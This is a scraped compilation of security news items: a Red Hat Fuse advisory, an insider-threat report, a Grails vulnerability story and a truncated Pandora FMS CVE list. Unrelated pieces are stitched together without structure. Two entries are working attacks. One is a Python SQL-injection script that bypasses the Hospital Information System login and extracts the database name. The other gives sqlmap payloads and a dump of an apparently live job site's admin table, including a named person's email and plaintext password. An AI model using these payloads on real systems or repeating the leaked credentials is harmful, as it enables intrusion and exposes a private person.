Red Hat Security Advisory 2022-5532-01 - This release of Red Hat Fuse 7.11.0 serves as a replacement for Red Hat Fuse 7.10 and includes bug fixes and enhancements, which are documented in the Release Notes document linked in the References. Issues addressed include HTTP request smuggling, bypass, code execution, denial of service, deserialization, information leakage, memory leak, privilege escalation, and traversal vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: Red Hat Fuse 7.11.0 release and security update  
Advisory ID:       RHSA-2022:5532-01  
Product:           Red Hat JBoss Fuse  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5532  
Issue date:        2022-07-07  
CVE Names:         CVE-2020-7020 CVE-2020-9484 CVE-2020-15250  
                   CVE-2020-25689 CVE-2020-29582 CVE-2020-36518  
                   CVE-2021-2471 CVE-2021-3629 CVE-2021-3642  
                   CVE-2021-3644 CVE-2021-3807 CVE-2021-3859  
                   CVE-2021-4178 CVE-2021-22060 CVE-2021-22096  
                   CVE-2021-22119 CVE-2021-22569 CVE-2021-22573  
                   CVE-2021-24122 CVE-2021-25122 CVE-2021-25329  
                   CVE-2021-29505 CVE-2021-30640 CVE-2021-33037  
                   CVE-2021-33813 CVE-2021-35515 CVE-2021-35516  
                   CVE-2021-35517 CVE-2021-36090 CVE-2021-38153  
                   CVE-2021-40690 CVE-2021-41079 CVE-2021-41766  
                   CVE-2021-42340 CVE-2021-42550 CVE-2021-43797  
                   CVE-2021-43859 CVE-2022-0084 CVE-2022-1259  
                   CVE-2022-1319 CVE-2022-21363 CVE-2022-21724  
                   CVE-2022-22932 CVE-2022-22950 CVE-2022-22968  
                   CVE-2022-22970 CVE-2022-22971 CVE-2022-22976  
                   CVE-2022-22978 CVE-2022-23181 CVE-2022-23221  
                   CVE-2022-23596 CVE-2022-23913 CVE-2022-24614  
                   CVE-2022-25845 CVE-2022-26336 CVE-2022-26520  
                   CVE-2022-30126  
====================================================================  
1. Summary:

A minor version update (from 7.10 to 7.11) is now available for Red Hat  
Fuse. The purpose of this text-only errata is to inform you about the  
security issues fixed in this release.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

This release of Red Hat Fuse 7.11.0 serves as a replacement for Red Hat  
Fuse 7.10 and includes bug fixes and enhancements, which are documented in  
the Release Notes document linked in the References.

Security Fix(es):

* fastjson (CVE-2022-25845)

* jackson-databind (CVE-2020-36518)

* mysql-connector-java (CVE-2021-2471, CVE-2022-21363)

* undertow (CVE-2022-1259, CVE-2021-3629, CVE-2022-1319)

* wildfly-elytron (CVE-2021-3642)

* nodejs-ansi-regex (CVE-2021-3807, CVE-2021-3807)

* 3 qt (CVE-2021-3859)

* kubernetes-client (CVE-2021-4178)

* spring-security (CVE-2021-22119)

* protobuf-java (CVE-2021-22569)

* google-oauth-client (CVE-2021-22573)

* XStream (CVE-2021-29505, CVE-2021-43859)

* jdom (CVE-2021-33813, CVE-2021-33813)

* apache-commons-compress (CVE-2021-35515, CVE-2021-35516, CVE-2021-35517,  
CVE-2021-36090)

* Kafka (CVE-2021-38153)

* xml-security (CVE-2021-40690)

* logback (CVE-2021-42550)

* netty (CVE-2021-43797)

* xnio (CVE-2022-0084)

* jdbc-postgresql (CVE-2022-21724)

* spring-expression (CVE-2022-22950)

* springframework (CVE-2021-22096, CVE-2021-22060, CVE-2021-22096,  
CVE-2022-22976, CVE-2022-22970, CVE-2022-22971, CVE-2022-22978)

* h2 (CVE-2022-23221)

* junrar (CVE-2022-23596)

* artemis-commons (CVE-2022-23913)

* elasticsearch (CVE-2020-7020)

* tomcat (CVE-2021-24122, CVE-2021-25329, CVE-2020-9484, CVE-2021-25122,  
CVE-2021-33037, CVE-2021-30640, CVE-2021-41079, CVE-2021-42340,  
CVE-2022-23181)

* junit4 (CVE-2020-15250)

* wildfly-core (CVE-2020-25689, CVE-2021-3644)

* kotlin (CVE-2020-29582)

* karaf (CVE-2021-41766, CVE-2022-22932)

* Spring Framework (CVE-2022-22968)

* metadata-extractor (CVE-2022-24614)

* poi-scratchpad (CVE-2022-26336)

* postgresql-jdbc (CVE-2022-26520)

* tika-core (CVE-2022-30126)

For more details about the security issues, including the impact, CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

Installation instructions are available from the Fuse 7.11.0 product  
documentation page:  
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.11/

4. Bugs fixed (https://bugzilla.redhat.com/):

1838332 - CVE-2020-9484 tomcat: deserialization flaw in session persistence storage leading to RCE  
1887810 - CVE-2020-15250 junit4: TemporaryFolder is shared between all users across system which could result in information disclosure  
1893070 - CVE-2020-25689 wildfly-core: memory leak in WildFly host-controller in domain mode while not able to reconnect to domain-controller  
1893125 - CVE-2020-7020 elasticsearch: not properly preserving security permissions when executing complex queries may lead to information disclosure  
1917209 - CVE-2021-24122 tomcat: Information disclosure when using NTFS file system  
1930291 - CVE-2020-29582 kotlin: vulnerable Java API was used for temporary file and folder creation which could result in information disclosure  
1934032 - CVE-2021-25122 tomcat: Request mix-up with h2c  
1934061 - CVE-2021-25329 tomcat: Incomplete fix for CVE-2020-9484 (RCE via session persistence)  
1966735 - CVE-2021-29505 XStream: remote command execution attack by manipulating the processed input stream  
1973413 - CVE-2021-33813 jdom: XXE allows attackers to cause a DoS via a crafted HTTP request  
1976052 - CVE-2021-3644 wildfly-core: Invalid Sensitivity Classification of Vault Expression  
1977064 - CVE-2021-22119 spring-security: Denial-of-Service (DoS) attack via initiation of Authorization Request  
1977362 - CVE-2021-3629 undertow: potential security issue in flow control over HTTP/2 may lead to DOS  
1981407 - CVE-2021-3642 wildfly-elytron: possible timing attack in ScramServer  
1981533 - CVE-2021-33037 tomcat: HTTP request smuggling when used with a reverse proxy  
1981544 - CVE-2021-30640 tomcat: JNDI realm authentication weakness  
1981895 - CVE-2021-35515 apache-commons-compress: infinite loop when reading a specially crafted 7Z archive  
1981900 - CVE-2021-35516 apache-commons-compress: excessive memory allocation when reading a specially crafted 7Z archive  
1981903 - CVE-2021-35517 apache-commons-compress: excessive memory allocation when reading a specially crafted TAR archive  
1981909 - CVE-2021-36090 apache-commons-compress: excessive memory allocation when reading a specially crafted ZIP archive  
2004820 - CVE-2021-41079 tomcat: Infinite loop while reading an unexpected TLS packet when using OpenSSL JSSE engine  
2007557 - CVE-2021-3807 nodejs-ansi-regex: Regular expression denial of service (ReDoS) matching ANSI escape codes  
2009041 - CVE-2021-38153 Kafka: Timing Attack Vulnerability for Apache Kafka Connect and Clients  
2010378 - CVE-2021-3859 undertow: client side invocation timeout raised when calling over HTTP2  
2011190 - CVE-2021-40690 xml-security: XPath Transform abuse allows for information disclosure  
2014356 - CVE-2021-42340 tomcat: OutOfMemoryError caused by HTTP upgrade connection leak could lead to DoS  
2020583 - CVE-2021-2471 mysql-connector-java: unauthorized access to critical  
2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling  
2033560 - CVE-2021-42550 logback: remote code execution through JNDI call from within its configuration file  
2034388 - CVE-2021-4178 kubernetes-client: Insecure deserialization in unmarshalYaml method  
2034584 - CVE-2021-22096 springframework: malicious input leads to insertion of additional log entries  
2039903 - CVE-2021-22569 protobuf-java: potential DoS in the parsing procedure for binary data  
2044596 - CVE-2022-23221 h2: Loading of custom classes from remote servers through JNDI  
2046279 - CVE-2022-22932 karaf: path traversal flaws  
2046282 - CVE-2021-41766 karaf: insecure java deserialization  
2047343 - CVE-2022-21363 mysql-connector-java: Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Connectors  
2047417 - CVE-2022-23181 tomcat: local privilege escalation vulnerability  
2049778 - CVE-2022-23596 junrar: A carefully crafted RAR archive can trigger an infinite loop while extracting  
2049783 - CVE-2021-43859 xstream: Injecting highly recursive collections or maps can cause a DoS  
2050863 - CVE-2022-21724 jdbc-postgresql: Unchecked Class Instantiation when providing Plugin Classes  
2055480 - CVE-2021-22060 springframework: Additional Log Injection in Spring Framework (follow-up to CVE-2021-22096)  
2058763 - CVE-2022-24614 metadata-extractor: Out-of-memory when reading a specially crafted JPEG file  
2063292 - CVE-2022-26336 poi-scratchpad: A carefully crafted TNEF file can cause an out of memory exception  
2063601 - CVE-2022-23913 artemis-commons: Apache ActiveMQ Artemis DoS  
2064007 - CVE-2022-26520 postgresql-jdbc: Arbitrary File Write Vulnerability  
2064226 - CVE-2022-0084 xnio: org.xnio.StreamConnection.notifyReadClosed log to debug instead of stderr  
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects  
2069414 - CVE-2022-22950 spring-expression: Denial of service via specially crafted SpEL expression  
2072339 - CVE-2022-1259 undertow: potential security issue in flow control over HTTP/2 may lead to DOS(incomplete fix for CVE-2021-3629)  
2073890 - CVE-2022-1319 undertow: Double AJP response for 400 from EAP 7 results in CPING failures  
2075441 - CVE-2022-22968 Spring Framework: Data Binding Rules Vulnerability  
2081879 - CVE-2021-22573 google-oauth-client: Token signature not verified  
2087214 - CVE-2022-22976 springframework: BCrypt skips salt rounds for work factor of 31  
2087272 - CVE-2022-22970 springframework: DoS via data binding to multipartFile or servlet part  
2087274 - CVE-2022-22971 springframework: DoS with STOMP over WebSocket  
2087606 - CVE-2022-22978 springframework: Authorization Bypass in RegexRequestMatcher  
2088523 - CVE-2022-30126 tika-core: Regular Expression Denial of Service in standards extractor  
2100654 - CVE-2022-25845 fastjson: autoType shutdown restriction bypass leads to deserialization

5. References:

https://access.redhat.com/security/cve/CVE-2020-7020  
https://access.redhat.com/security/cve/CVE-2020-9484  
https://access.redhat.com/security/cve/CVE-2020-15250  
https://access.redhat.com/security/cve/CVE-2020-25689  
https://access.redhat.com/security/cve/CVE-2020-29582  
https://access.redhat.com/security/cve/CVE-2020-36518  
https://access.redhat.com/security/cve/CVE-2021-2471  
https://access.redhat.com/security/cve/CVE-2021-3629  
https://access.redhat.com/security/cve/CVE-2021-3642  
https://access.redhat.com/security/cve/CVE-2021-3644  
https://access.redhat.com/security/cve/CVE-2021-3807  
https://access.redhat.com/security/cve/CVE-2021-3859  
https://access.redhat.com/security/cve/CVE-2021-4178  
https://access.redhat.com/security/cve/CVE-2021-22060  
https://access.redhat.com/security/cve/CVE-2021-22096  
https://access.redhat.com/security/cve/CVE-2021-22119  
https://access.redhat.com/security/cve/CVE-2021-22569  
https://access.redhat.com/security/cve/CVE-2021-22573  
https://access.redhat.com/security/cve/CVE-2021-24122  
https://access.redhat.com/security/cve/CVE-2021-25122  
https://access.redhat.com/security/cve/CVE-2021-25329  
https://access.redhat.com/security/cve/CVE-2021-29505  
https://access.redhat.com/security/cve/CVE-2021-30640  
https://access.redhat.com/security/cve/CVE-2021-33037  
https://access.redhat.com/security/cve/CVE-2021-33813  
https://access.redhat.com/security/cve/CVE-2021-35515  
https://access.redhat.com/security/cve/CVE-2021-35516  
https://access.redhat.com/security/cve/CVE-2021-35517  
https://access.redhat.com/security/cve/CVE-2021-36090  
https://access.redhat.com/security/cve/CVE-2021-38153  
https://access.redhat.com/security/cve/CVE-2021-40690  
https://access.redhat.com/security/cve/CVE-2021-41079  
https://access.redhat.com/security/cve/CVE-2021-41766  
https://access.redhat.com/security/cve/CVE-2021-42340  
https://access.redhat.com/security/cve/CVE-2021-42550  
https://access.redhat.com/security/cve/CVE-2021-43797  
https://access.redhat.com/security/cve/CVE-2021-43859  
https://access.redhat.com/security/cve/CVE-2022-0084  
https://access.redhat.com/security/cve/CVE-2022-1259  
https://access.redhat.com/security/cve/CVE-2022-1319  
https://access.redhat.com/security/cve/CVE-2022-21363  
https://access.redhat.com/security/cve/CVE-2022-21724  
https://access.redhat.com/security/cve/CVE-2022-22932  
https://access.redhat.com/security/cve/CVE-2022-22950  
https://access.redhat.com/security/cve/CVE-2022-22968  
https://access.redhat.com/security/cve/CVE-2022-22970  
https://access.redhat.com/security/cve/CVE-2022-22971  
https://access.redhat.com/security/cve/CVE-2022-22976  
https://access.redhat.com/security/cve/CVE-2022-22978  
https://access.redhat.com/security/cve/CVE-2022-23181  
https://access.redhat.com/security/cve/CVE-2022-23221  
https://access.redhat.com/security/cve/CVE-2022-23596  
https://access.redhat.com/security/cve/CVE-2022-23913  
https://access.redhat.com/security/cve/CVE-2022-24614  
https://access.redhat.com/security/cve/CVE-2022-25845  
https://access.redhat.com/security/cve/CVE-2022-26336  
https://access.redhat.com/security/cve/CVE-2022-26520  
https://access.redhat.com/security/cve/CVE-2022-30126  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.fuse&version=7.11.0  
https://access.redhat.com/documentation/en-us/red_hat_fuse/7.11/

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYuFkRNzjgjWX9erEAQg9LQ/9HYM6Ig0vTdDrN6ITdimAnjShWe/4Nyxx  
iZeg/VprKnpSQDRvNKIKUBuiKSggiTY4MZa3dXSJLkS57EyqZiWWTT2ADyN0Z6cm  
+sAQar6GTPg9eyZdMDeuM7plwQQZk8mzSj8aDN2QzHevnmNBlHlVE2MwpZmzVUjo  
O3/UhM4up60Z5Ryyk/4tWRry8wpj7rL9pW3HiVkxdHlDNijaxJ7PerXGItMpVytT  
0IVDwHz3jdJJH3/5uaeippUFu1S+L+75CwIUlvr25YIj3XQ4Sv1vdLvamf8j9P+8  
pVRnRyPl7vh2hXl8p2fby58LBINJKmUOOugeMWo2yoz9B4HQiTUOqXrOTe9nUD+P  
Ntx9YGTX6UhNG562eTAGGrKi0J0rd11FdqVfw12JeXWGqzYRfFW/UdKaRYCUQt24  
9O7FuzAHALe5Bcl7rGtKvbnY2DyLJ4AO3YdbskS502sTFjEfcdPObfQWaYniBBhx  
n8cmjdMB3bdGzpbPt/tlnYFNqdC9MSEn2J8kSlGMWP5Ntj5WYzReTiPAFY42dYpM  
gA4vqWNTn+lRAPm232u4CY9K7cDCz8Qdz22hoS21YulQXV+lDYyeyxCv0SwmG4yO  
rL5Uv5DOSmtH8UHa/vLTHKW7R59uuOLeAumfjRVxj52DJSCUTTGeKjBVTkjkpzq4  
rUyXD0vegnU=m5cz  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5532-01

Sims v1.0 was discovered to contain an arbitrary file upload vulnerability via the component /uploadServlet. This vulnerability allows attackers to escalate privileges and execute arbitrary commands via a crafted file.

CVE-2022-34549: CWE-434: Unrestricted Upload of File with Dangerous Type (4.8)

Insiders could become more vulnerable to cybercrime recruitment efforts, new report says.

Declining economic conditions could make insiders more susceptible to recruitment offers from threat actors looking for allies to assist them in carrying out various attacks.

Enterprise security teams need to be aware of the heightened risk and strengthen measures for protecting against, detecting, and responding to insider threats, researchers from Palo Alto Network's Unit 42 threat intelligence team recommended in a report this week.

The security vendor's report highlighted several other important takeaways for security operations teams, including the fact that ransomware and business email compromise attacks continue to dominate incident response cases and vulnerability exploits — accounting for nearly one-third of all breaches.

**Vulnerable Insiders**

Unit 42 researchers analyzed data from a sampling of over 600 incident response engagements between April 2021 and May 2022 and determined that difficult economic times could lure more actors to cybercrime. This could include both people with technical skills looking to make a fast buck, as well as financially stressed insiders with legitimate access to valuable enterprise data and IT assets. The prevalence of remote and hybrid work models has created an environment where it's easier for workers to steal intellectual property or carry out other malicious activity, the researchers found.

Palo Alto Networks' report points to how some threat actors — such as the highly destructive LAPSUS$ group — have attempted to recruit insiders by offering money for access credentials or for helping them carry out their attack in other ways. "When some people are struggling to make ends meet, \[such\] offers could be more tempting to some," the report said.

This trend has been flagged before: A report from Flashpoint in May noted the growing popularity of insider recruitment efforts among threat actors. Flashpoint counted as many as 3,988 unique insider-related chat discussions — primarily on Telegram — between Jan. 1 and Nov. 30, 2021, with a particularly sharp spike happening after August. Many of those attempting to recruit were ransomware operators or other extortion groups. Commonly employed tactics included using a known insider or running public recruitment advertisements and direct solicitation.

Another survey that Pulse and Hitachi ID conducted of 100 IT and security professionals showed 65% saying that threat actors had approached them or their employees for assistance with a ransomware attack over the past year.

**Phishing, Software Vulns Remain Major Initial Access Vectors**

Unit 42's research also confirmed what security teams fighting on the front lines to keep their organizations safe already know: Ransomware and BEC attacks continue to dominate the need for incident response. A startling 70% of intrusions were tied to one of these two causes. In BEC attacks, the data showed that threat actors typically spent between 7 and 48 days in the breached environment before the victim contained the threat, with a median dwell time of 38 days. The median dwell time for ransomware attacks was slightly lower, at 28 days, likely because of how noisy these attacks are.

Phishing continues to be the top vector for initial access so far in 2022, and was the suspected cause in 37% of the incident response cases that Unit 42 completed between April 2021 and May 2022.

"Unfortunately, most organizations learn about one of these attacks the hard way — upon receiving an extortion demand or after wire fraud is committed," says Dan O’Day, consulting director, Unit 42 at Palo Alto Networks. "Increasingly, threat actors quickly gain access, identify and exfiltrate sensitive data, and deploy extortion tactics — sometimes in a matter of hours or in just a few days."

Notably, 31% — or nearly one-in-three intrusions — resulted from attackers gaining an initial foothold via a software vulnerability. Some 87% of the vulnerabilities that Unit 42 researchers were able to positively identity fell into one of six categories: ProxyLogon and ProxyShell flaws in Exchange Server; the Apache Log4j flaw; and vulnerabilities in technologies from Zoho, SonicWall and Fortinet. In 55% of incidents where Unit 42 was able to positively identify the vulnerability that an attacker used to gain initial access, the vulnerability was ProxyShell, and in 14% of the cases it was Log4j.

"Because one-third of attacks target software vulnerabilities, security teams should continue to patch vulnerabilities early and often," says O'Day. While some threat actors continue to rely on older, unpatched vulnerabilities, others are looking to exploit new vulnerabilities increasingly quickly. "In fact, it can practically coincide with the reveal if the vulnerabilities themselves and the access that can be achieved by exploiting them are significant enough," he says.

As one example, he points to a threat prevention signature that Palo Alto Networks released for an authentication bypass vulnerability in F5 Big IP technology (CVE-2022-1388). "Within just 10 hours, the signature triggered 2,552 times due to vulnerability scanning and active exploitation attempts," he says. "More and more, we're seeing attackers scanning as soon as details of a critical vulnerability are published."

Poor patch management practices exacerbated the issue for many organizations — it contributed to 28% of the breaches that Unit 42 responded to. One example of poor patch management is simply waiting too long to implement a patch for a known vulnerability, O'Day notes. "Further, around 30% of organizations were running end-of-life software versions that were affected by CVEs that had known active exploits in the wild and were featured in cybersecurity advisories from the US government."

Economic Downturn Raises Risk of Insiders Going Rogue

Hospital Information System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    # Exploit Title: Hospital Information System - SQL Injection via login page# Date: 25/07/2022# Exploit Author: saitamang# Vendor Homepage: https://code-projects.org# Software Link: https://download-media.code-projects.org/2019/11/HOSPITAL_INFORMATION_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip# Version: 1.0# Tested on: Centos 7 apache2 + MySQLimport requests, string, sys, warnings, time, concurrent.futuresfrom requests.packages.urllib3.exceptions import InsecureRequestWarningwarnings.simplefilter('ignore',InsecureRequestWarning)dbname = ''req = requests.Session()def login(ip,username,password):      target = "http://%s/HIS/includes/users/UsersController.php" %ip    data = {'type':'login','username':username,'password':password}    response = req.post(target, data=data)    if 'success' in response.text:        print("[$] Success Login with credentials "+username+":"+password+"")    else:        print("[$] Failed Login with credentials "+username+":"+password+"")def check_injection():    # library inj    test_query0 = "'or 1=2#"    test_query1 = "'or 1=1#"    target = "http://%s/HIS/includes/users/UsersController.php" %ip    result = ""    for i in range(2):        if i==0:            data = {'type':'login','username':username,'password':test_query0}            response = req.post(target, data=data)            if response.text=="success":                result = response.text            else:                pass        if i==1:            data = {'type':'login', 'username':username,'password':test_query1}            response = req.post(target, data=data)            if response.text=="success":                result = response.text            else:                pass    if result=="success":        print("[##] SQLI Boolean-Based Present at password field :)")    else:        print("[##] No SQLI :)")def brute(dbname):    target = "http://%s/HIS/includes/users/UsersController.php" %ip    l=0    no = [int(a) for a in str(string.digits)]    # checking length of dbname    for i in no: # 0-9        payload = "'or 1=1 and length(database())='"+ str(i) +"'#"        #print(payload)            data = {'type':'login','username':username,'password':payload}        response = req.post(target, data=data)        result = response.text        if result=="success":            print("[##] The correct length of DB name is "+str(i))            l=i            break        else:            print("[##] The length of DB name "+str(i)+" is wrong")            pass    char = [char for char in string.ascii_lowercase]    dbname = []    for i in range(l):        for j in char:            payload = "'or 1=1 and substring(database()," + str(i+1) + ",1)='" + str(j) +"'#"                        data = {'type':'login','username':username,'password':payload}            response = req.post(target, data=data)            result = response.text            if result=="success":                dbname.append(j)                print("[+] The " + str(i+1) + " char of DB name is "+str(j))                break            else:                pass    dbname = ''.join(dbname)        print("[+] Database name retrieved --> "+dbname)    print("[+] Bypass completed :)")    print("[+] Bypass payload can be used is \n'or 1=1#")    password = "'or 1=1#"    print("\nRetry to login with new payload in password field")    login(ip,username,password)if __name__ == "__main__":    print("   _____       _ __                                   ")    print("  / ___/____ _(_) /_____ _____ ___  ____ _____  ____ _")    print("  \__ \/ __ `/ / __/ __ `/ __ `__ \/ __ `/ __ \/ __ `/")    print(" ___/ / /_/ / / /_/ /_/ / / / / / / /_/ / / / / /_/ / ")    print("/____/\__,_/_/\__/\__,_/_/ /_/ /_/\__,_/_/ /_/\__, /  ")    print("                                             /____/   \n\n")    try:        ip = sys.argv[1].strip()        username = sys.argv[2].strip()        password = sys.argv[3].strip()        login(ip,username,password)        check_injection()        brute(dbname)            except IndexError:        print("[-] Usage %s <ip> <username> <password>" % sys.argv[0])        print("[-] Example: %s 192.168.100.x admin admin123" % sys.argv[0])    sys.exit(-1)

Hospital Information System 1.0 SQL Injection

Expert X Jobs Portal and Resume Builder version 1.0 suffers from a remote SQL injection vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                       [ Exploits ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                        │ │                                         :│  Website  : wvidesk.com                    │ │                                         ││  Vendor   : WVIDesk                        │ │                                         ││  Software : Expert X - Jobs Portal and     │ │ Expert X can manage jobs, courses,      ││             Resume Builder v. 1.0          │ │ events and scholarships.                ││  Vuln Type: Remote SQL Injection           │ │                                         ││  Method   : GET                            │ │                                         ││  Impact   : Database Access                │ │                                         ││                                            │ │                                         ││────────────────────────────────────────────┘ └─────────────────────────────────────────││                              B4nks-NET irc.b4nks.tk #unix                             ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  Typically used for remotely exploitable vulnerabilities that can lead to              ││  system compromise.                                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk     loool, DevS, Dark-Gost, Carlos132sp, ProGenius        CryptoJob (Twitter) twitter.com/CryptozJob┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                     © CraCkEr 2022                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘GET parameter 'listed' is vulnerable.---Parameter: listed (GET)    Type: boolean-based blind    Title: AND boolean-based blind - WHERE or HAVING clause    Payload: listed=1' AND 6926=6926 AND 'ZFlv'='ZFlv    Type: error-based    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)    Payload: listed=1' AND (SELECT 6137 FROM(SELECT COUNT(*),CONCAT(0x7178787071,(SELECT (ELT(6137=6137,1))),0x717a6a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'NsfD'='NsfD    Type: time-based blind    Title: MySQL < 5.0.12 OR time-based blind (BENCHMARK - comment)    Payload: listed=1' OR 8793=BENCHMARK(5000000,MD5(0x6643566c))#---[+] Starting the Attacksqlmap.py -u "http://expert.wvidesk.com/companies?listed=1" --current-db --batch --random-agent[INFO] the back-end DBMS is MySQLweb application technology: PHP, Apache, PHP 5.6.40back-end DBMS: MySQL >= 5.0 (MariaDB fork)[23:03:36] [INFO] fetching current database[23:03:36] [INFO] retrieved: 'livexzfv_jobdreamers'current database: 'livexzfv_jobdreamers'fetching tables for database: 'livexzfv_jobdreamers'Database: livexzfv_jobdreamers[56 tables]+---------------------+| adminMenu           || applyajob           || candidatefeedback   || candidatelogin      || candidateview       || clickcount          || controlall          || controlcategory     || coursecategory      || courseinstitute     || coursevisitsite     || eventcategory       || eventtype           || jobagentcountry     || jobalert            || jobcategory         || jobcity             || jobcompanyinfo      || jobcontinent        || jobcountry          || jobeducationsubject || jobindustry         || jobmessage          || jobpostingprice     || jobquestion         || jobseniority        || jobuniversity       || jobusermaster       || jobusertype         || jobvisitsite        || mainmenu            || postacourse         || postaevent          || postajob            || postascholarship    || resumeaward         || resumecarsum        || resumecertificate   || resumecomment       || resumeeducation     || resumelanguage      || resumeprofessional  || resumepublication   || resumeresearch      || resumeskill         || resumesumexp        || resumetraining      || resumework          || scholarshipperiod   || seeker_profile      || seekers_admin       || siteAdmin           || siteadminuser       || tbl_countries       || tblpage             || userrole            |+---------------------+fetching columns for table 'siteadminuser' in database 'livexzfv_jobdreamers'Database: livexzfv_jobdreamersTable: siteadminuser[8 columns]+----------+--------------+| Column   | Type         |+----------+--------------+| aflag    | varchar(2)   || desig    | varchar(200) || enet     | varchar(450) || fullname | varchar(450) || id       | int(10)      || pw       | varchar(25)  || role     | int(10)      || users    | varchar(200) |+----------+--------------+fetching entries of column(s) 'aflag,desig,enet,fullname,id,pw,role,users' for table 'siteadminuser' in database 'livexzfv_jobdreamers'Database: livexzfv_jobdreamersTable: siteadminuser[1 entry]+-------+------------+--------------------+------------------------+----+------+------+-------+| aflag | desig      | enet               | fullname               | id | pw   | role | users |+-------+------------+--------------------+------------------------+----+------+------+-------+| Y     | Site Admin | alam5664@gmail.com | Mohammad Alamgir Kabir | 1  | 5664 | 1    | Kabir |+-------+------------+--------------------+------------------------+----+------+------+-------+[-] Done

Expert X Jobs Portal And Resume Builder 1.0 SQL Injection

Maintainers warn to patch all versions of open source web app framework – even those not deemed vulnerable

Maintainers warn to patch all versions of open source web app framework – even those not deemed vulnerable

  

Researchers from AntGroup FG Security Lab have discovered a critical security vulnerability allowing an attacker to remotely execute code within a Grails application runtime.

Grails is an open source web application framework based on the Apache Groovy programming language and is used for developing agile web applications. Customers include Google, IBM, Walmart, Credit Suisse, and Mastercard.

The flaw, tracked using CVE-2022-35912, allows an attacker to remotely execute code within a Grails application runtime by issuing a specially crafted web request that grants the attacker access to the class loader.

Read more of the latest news about web security vulnerabilities

The attack exploits a section of the Grails data-binding logic, which is invoked in a number of ways including the creation of command objects, domain class construction, and manual data binding when using bindData.

The vulnerability has been confirmed on Grails framework versions 3.3.10 and higher, including Grails framework 4 and 5, that are running on Java 8. It has been observed in both the embedded Tomcat runtime and applications deployed as a Web Archive (WAR) to a Tomcat instance.

“Due to the nature of this vulnerability, we strongly suggest that all Grails applications, including those that are not vulnerable to this specific attack, be updated to a patched Grails release,” the Grails team noted in a blog post.

“While we have not been able to reproduce this specific exploit on applications running in Java 11 or in versions of the Grails framework before 3.3.10, the nature of the vulnerability is such that variations on the attack could be discovered that earlier Grails releases, and Grails applications running on higher versions of Java will be impacted.”

**Patches available**

Versions 5.2.1, 5.1.9, 4.1.1, and 3.3.15 have now been patched, and the team recommends upgrading to a patched version. Grails 4.x applications can be upgraded to version 4.1.1 or higher, Grails 5.0.x and 5.1.x applications can be upgraded to 5.1.9 or higher, and Grails 5.2 applications can be upgraded to 5.2.1 or higher.

“The Grails Foundation and the Grails core development team take application security very seriously,” wrote the team. “We are continuing to research and monitor this vulnerability.”

YOU MAY ALSO LIKE Cisco patches dangerous bug trio in Nexus Dashboard

Critical security vulnerability in Grails could lead to remote code execution

In Pandora FMS v7.0NG.761 and below, in the agent creation section, the alias parameter is vulnerable to a Stored Cross Site-Scripting. This vulnerability can be exploited by an attacker with administrator privileges logged in the system.

CVE-2022-2032 Stored Cross Site-Scripting in File Manager 14 Jun 2022 762 CVE-2022-2059 Stored Cross Site-Scripting in Agent Manager 14 Jun 2022 762 CVE-2022-1648 Relative Path Traversal to Remote Code Execution in File Manager 13 May 2022 761 CVE-2022-26310 Improper Authorization in User Management to Vertical Privilege Escalation 13 May 2022 761 CVE-2022-26309 Cross-Site Request en Bulk operation (User operation) 13 May 2022 761 CVE-2022-26308 Improper Access Control in Configuration (Credential store) 13 May 2022 761 CVE-2022-0507 Vulnerability: Authenticated SQL Injection in API 10 Feb 2022 760 CVE-2021-46681 Vulnerability XSS in module mass operation name field 15 Sept 2021 757 CVE-2021-46680 Vulnerability XSS in module form name field 15 Sept 2021 757 CVE-2021-46679 Vulnerability XSS in service elements 15 Sept 2021 757 CVE-2021-46678 Vulnerability XSS in service from name field 15 Sept 2021 757 CVE-2021-46677 Vulnerability XSS in Event filter name field 15 Sept 2021 757 CVE-2021-46676 Vulnerability XSS in Transaction Map name field 15 Sept 2021 757 CVE-2021-34075 In Artica Pandora FMS <=754 in the File Manager component, there is sensitive information exposed on the client side which attackers can access. 30 Jun 2021 756 CVE-2021-35501 Vulnerability XSS in 